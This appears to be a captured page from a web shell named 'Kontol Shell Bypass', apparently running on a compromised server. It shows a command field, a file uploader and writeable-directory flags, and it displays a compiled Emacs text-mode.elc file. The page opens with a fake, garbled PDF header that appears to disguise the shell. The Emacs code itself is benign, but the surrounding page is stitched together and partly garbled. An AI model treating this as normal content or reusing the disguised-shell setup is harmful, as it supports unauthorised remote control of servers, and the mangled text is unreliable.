%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/emacs/25.2/lisp/textmodes/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/emacs/25.2/lisp/textmodes/text-mode.elc
;ELC
;;; Compiled
;;; in Emacs version 25.2
;;; with all optimizations.

;;; This file uses dynamic docstrings, first added in Emacs 19.29.

;;; This file does not contain utf-8 non-ASCII characters,
;;; and so can be loaded in Emacs versions earlier than 23.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


#@65 Normal hook run when entering Text mode and many related modes.
(custom-declare-variable 'text-mode-hook ''(text-mode-hook-identify) '(#$ . 408) :type 'hook :options '(turn-on-auto-fill turn-on-flyspell) :group 'wp)
#@107 Non-nil if this buffer's major mode is a variant of Text mode.
Use (derived-mode-p \='text-mode) instead.
(defvar text-mode-variant nil (#$ . 631))
#@41 Syntax table used while in `text-mode'.
(defvar text-mode-syntax-table (byte-code "\301 \302\303\304#\210\302\305\304#\210\302\306\307#\210\302\310\311\"\210\302\312\311\"\210\302\313\311\"\210\302\314\311\"\210\302\315\311\"\210)\207" [st make-syntax-table modify-syntax-entry 34 ".   " 92 39 "w p" 1523 "w   " 1524 183 8231 65306] 4) (#$ . 785))
#@151 Keymap for `text-mode'.
Many other modes, such as `mail-mode', `outline-mode' and `indented-text-mode',
inherit all the commands defined in this map.
(defvar text-mode-map (byte-code "\302 \303\304\305#\210\303\306\307\302\307!B#\210\310\311\312#\210\310\313\314#\210\310\315	#\210\310\316\317#\210\310\320\321#\210\310\322\323#\210)\207" [map menu-bar-separator make-sparse-keymap define-key "	" ispell-complete-word [menu-bar text] "Text" bindings--define-key [menu-bar text toggle-text-mode-auto-fill] (menu-item "Auto Fill" toggle-text-mode-auto-fill :button (:toggle memq 'turn-on-auto-fill text-mode-hook) :help "Automatically fill text while typing in text modes (Auto Fill mode)") [menu-bar text paragraph-indent-minor-mode] (menu-item "Paragraph Indent" paragraph-indent-minor-mode :button (:toggle bound-and-true-p paragraph-indent-minor-mode) :help "Toggle paragraph indent minor mode") [menu-bar text sep] [menu-bar text center-region] (menu-item "Center Region" center-region :help "Center the marked region" :enable (region-active-p)) [menu-bar text center-paragraph] (menu-item "Center Paragraph" center-paragraph :help "Center the current paragraph") [menu-bar text center-line] (menu-item "Center Line" center-line :help "Center the current line")] 6) (#$ . 1145))
#@161 Hook run after entering Text mode.
No problems result if this variable is not bound.
`add-hook' automatically binds it.  (This is true for all hook variables.)
(defvar text-mode-hook nil (#$ . 2445))
(byte-code "\300\301!\204\f\302\301\303\304#\210\300\207" [boundp text-mode-map put definition-name text-mode] 4)
(defvar text-mode-map (make-sparse-keymap))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\305\306!\204\302\306\307\310#\210\300\207" [text-mode-map variable-documentation put purecopy "Keymap for `text-mode'." boundp text-mode-syntax-table definition-name text-mode] 5)
(defvar text-mode-syntax-table (make-syntax-table))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [text-mode-syntax-table variable-documentation put purecopy "Syntax table for `text-mode'." text-mode-abbrev-table definition-name text-mode] 5)
(defvar text-mode-abbrev-table (progn (define-abbrev-table 'text-mode-abbrev-table nil) text-mode-abbrev-table))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [text-mode-abbrev-table variable-documentation put purecopy "Abbrev table for `text-mode'." text-mode derived-mode-parent nil] 5)
#@299 Major mode for editing text written for humans to read.
In this mode, paragraphs are delimited only by blank or white lines.
You can thus get the full benefit of adaptive filling
 (see the variable `adaptive-fill-mode').
\{text-mode-map}
Turning on Text mode runs the normal hook `text-mode-hook'.
(defalias 'text-mode #[nil "\306\300!\210\307\310 \210\311\312\313!\210\314\f!\210
\306\315!\210\307
\306\316!\210\306\317!\210\320)\321\322!\207" [delay-mode-hooks major-mode mode-name text-mode-map text-mode-syntax-table text-mode-abbrev-table make-local-variable t kill-all-local-variables text-mode "Text" use-local-map set-syntax-table text-mode-variant require-final-newline indent-line-function indent-relative run-mode-hooks text-mode-hook local-abbrev-table mode-require-final-newline] 2 (#$ . 3639) nil])
#@166 Hook run after entering Parindent mode.
No problems result if this variable is not bound.
`add-hook' automatically binds it.  (This is true for all hook variables.)
(defvar paragraph-indent-text-mode-hook nil (#$ . 4472))
(byte-code "\300\301!\204\f\302\301\303\304#\210\300\207" [boundp paragraph-indent-text-mode-map put definition-name paragraph-indent-text-mode] 4)
(defvar paragraph-indent-text-mode-map (make-sparse-keymap))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [paragraph-indent-text-mode-map variable-documentation put purecopy "Keymap for `paragraph-indent-text-mode'." paragraph-indent-text-mode derived-mode-parent text-mode] 5)
#@430 Major mode for editing text, with leading spaces starting a paragraph.
In this mode, you do not need blank lines between paragraphs
when the first line of the following paragraph starts with whitespace.
`paragraph-indent-minor-mode' provides a similar facility as a minor mode.
Special commands:
\{text-mode-map}
Turning on Paragraph-Indent Text mode runs the normal hooks
`text-mode-hook' and `paragraph-indent-text-mode-hook'.
(defalias 'paragraph-indent-text-mode #[nil "\304\300!\210\305\306 \210\307\310\306\311N\203\312\307\311\306\311N#\210\313!\204'\314\315 \"\210\316!\210\317 \210)\320\321!\207" [delay-mode-hooks major-mode mode-name paragraph-indent-text-mode-map make-local-variable t text-mode paragraph-indent-text-mode "Parindent" mode-class put keymap-parent set-keymap-parent current-local-map use-local-map paragraph-indent-minor-mode run-mode-hooks paragraph-indent-text-mode-hook] 5 (#$ . 5159) nil])
#@123 Non-nil if Paragraph-Indent minor mode is enabled.
Use the command `paragraph-indent-minor-mode' to change this variable.
(defvar paragraph-indent-minor-mode nil (#$ . 6097))
(make-variable-buffer-local 'paragraph-indent-minor-mode)
#@337 Minor mode for editing text, with leading spaces starting a paragraph.
In this mode, you do not need blank lines between paragraphs when the
first line of the following paragraph starts with whitespace, as with
`paragraph-indent-text-mode'.
Turning on Paragraph-Indent minor mode runs the normal hook
`paragraph-indent-text-mode-hook'.
(defalias 'paragraph-indent-minor-mode #[(&optional arg) "\306 	\307=\203\n?\202\310	!\311V\312\313\314\211\f\314G&\315=\2036\n\204B\316\304!\210\fG\314O\202B\n\203B\316\304!\210\fP)\n\203S\317\320\321\322B\323\314$\210\202h\324\325\326!\323\"\211\325\326!=\204g\327\326
\"\210)\330\331\n\203r\332\202s\333\"\210\334\335!\203\232\306 \203\207\306 \232\203\232\336$\337\340\n\203\224\341\202\225\342$#\210))\343 \210\n\207" [#1=#:last-message arg paragraph-indent-minor-mode ps-re paragraph-start #2=#:new current-message toggle prefix-numeric-value 0 "[ 	\n\f]\\|" compare-strings nil t make-local-variable advice--add-function :override #[nil "\300\301!\207" [advice--buffer-local indent-line-function] 2] #[(gv--val) "\301\302\"\207" [gv--val advice--set-buffer-local indent-line-function] 3] indent-to-left-margin advice--remove-function advice--buffer-local indent-line-function advice--set-buffer-local run-hooks paragraph-indent-minor-mode-hook paragraph-indent-minor-mode-on-hook paragraph-indent-minor-mode-off-hook called-interactively-p any " in current buffer" message "Paragraph-Indent minor mode %sabled%s" "en" "dis" force-mode-line-update local] 8 (#$ . 6337) (list (or current-prefix-arg 'toggle))])
#@192 Hook run after entering or leaving `paragraph-indent-minor-mode'.
No problems result if this variable is not bound.
`add-hook' automatically binds it.  (This is true for all hook variables.)
(defvar paragraph-indent-minor-mode-hook nil (#$ . 7929))
(byte-code "\301\302\303\304\300!\205\n\303\211%\210\305\306\307\"\207" [paragraph-indent-minor-mode-map add-minor-mode paragraph-indent-minor-mode nil boundp defalias indented-text-mode text-mode] 6)
#@123 Mark that this mode has run `text-mode-hook'.
This is how `toggle-text-mode-auto-fill' knows which buffers to operate on.
(defalias 'text-mode-hook-identify #[nil "\301\300!\210\302\211\207" [text-mode-variant make-local-variable t] 2 (#$ . 8388)])
#@199 Toggle whether to use Auto Fill in Text mode and related modes.
This command affects all buffers that use modes related to Text mode,
both existing buffers and buffers that you subsequently create.
(defalias 'toggle-text-mode-auto-fill #[nil "\305>?\211\203\306\300\305\"\210\202\307\300\305\"\210\310 \311\211\203D@r\nq\210\312\313!\2040\f\203<\314	\2039\315\202:\316!\210)A\211\204*\317\320	\203O\321\202P\322\")\207" [text-mode-hook enable-mode buffer --dolist-tail-- text-mode-variant turn-on-auto-fill add-hook remove-hook buffer-list nil derived-mode-p text-mode auto-fill-mode 1 0 message "Auto Fill %s in Text modes" "enabled" "disabled"] 4 (#$ . 8645) nil])
(define-key facemenu-keymap "S" 'center-paragraph)
#@96 Center each nonblank line in the paragraph at or after point.
See `center-line' for more info.
(defalias 'center-paragraph #[nil "\212\301 \210n\204\f\302\303!\210`\304 \210\305`\"*\207" [end forward-paragraph newline 1 backward-paragraph center-region] 3 (#$ . 9391) nil])
#@84 Center each nonblank line starting in the region.
See `center-line' for more info.
(defalias 'center-region #[(from to) "	V\203
	\n)\212\214	}\210b\210m?\205.\212\303\304w\210l)\204(\305 \210\306y\210\202*\207" [from to tem " 	" nil center-line 1] 2 (#$ . 9674) "r"])
(define-key facemenu-keymap "s" 'center-line)
#@241 Center the line point is on, within the width specified by `fill-column'.
This means adjusting the indentation so that it equals
the distance between the end of the text and `fill-column'.
The argument NLINES says how many lines to center.
(defalias 'center-line #[(&optional nlines) "\203\304!\305=?\205b\212\306 \307\310 \210\311 \210\307\210\311 \210i\312\n	#\305V\2039\313\n\312\n	#\314\245\\!\210+\204D\305\211\202	\305V\203SS\315y\210\202\305W\203T\316y\210\202\207" [nlines line-length lm fill-column prefix-numeric-value 0 current-left-margin nil beginning-of-line delete-horizontal-space - indent-line-to 2 1 -1] 7 (#$ . 10008) "P"])

Kontol Shell Bypass